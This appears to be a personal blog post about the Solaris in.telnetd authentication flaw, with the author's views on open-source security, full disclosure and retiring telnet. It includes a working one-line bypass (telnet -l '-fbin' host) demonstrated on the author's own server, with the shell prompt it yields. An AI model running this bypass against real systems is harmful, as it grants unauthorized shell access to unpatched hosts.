my web 0.2 website

My telnet mantra has always been ‘Telnet is only dangerous if you use it’. Leaving it enabled as an emergency way-in during ssh upgrades, for example, is a good idea. It’s a better idea to leave it turned on and visable to just your home or office, but not use it unless you only pass through your own switched network between your desktop and server running telnet.

All this changed at the weekend with the disclosure of a flaw in the authentication model for Solaris’ in.telnetd. To try it out, first enable telnet

# inetadm -e telnet

Then connect from another machine in this way:

factory:~ andy$ telnet -l “-fbin” grumps.nosignal.org
Trying 213.232.80.121…
Connected to grumps.nosignal.org.
Escape character is ‘^]’.
couldn’t set locale correctly
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
————————————————————

Welcome to grumps.
$

Then (quickly) disable telnetd with an

# inetadm -d telnet

This attack raises some questions, the most interesting ones in my mind include :

• Does the publication of this flaw support or destroy the open source model?

The flaw was only discovered because the source to in.telnetd had been released as part of the disclosure of source to the OpenSolaris project. If the code had not been released this flaw would have not been noticed (yet), and therefore might have been picked up by the vendor and handled in a sensitive manner. On the other hand, releasing the code to the community has picked up this flaw quickly, so does the open source model lead to inherently more secure code?

• Is a mail to full-disclosure the best way to handle vulnerabilities?

It is certainly much more polite to contact the vendor so that a structured damage-limitatione exercise can begin! I don’t care that someone picks up a vulnerability in the software I use as long as one of the first people to find out is the vendor. With open source software, there is possibly no central ‘vendor’ to inform, but for the examples of the commercial companies, and huge projects like the Mozilla Foundation. The person reporting it to full-disclosure may have tried to tell Sun first, but there is no evidence to suggest this.

Well, Sun have released a patch in any case, but now that my remote sun boxes have Lights out Management cards I think it’s now time for a new mantra: Let Telnet Die. I still maintain that it’s no inherantly less secure than ssh (if used with ssl, of course), and perhaps more secure than ssh because the port-forwarding features in ssh aren’t present, but in the interests of exposing as little as possible to the outside world, I’m leaving it turned off.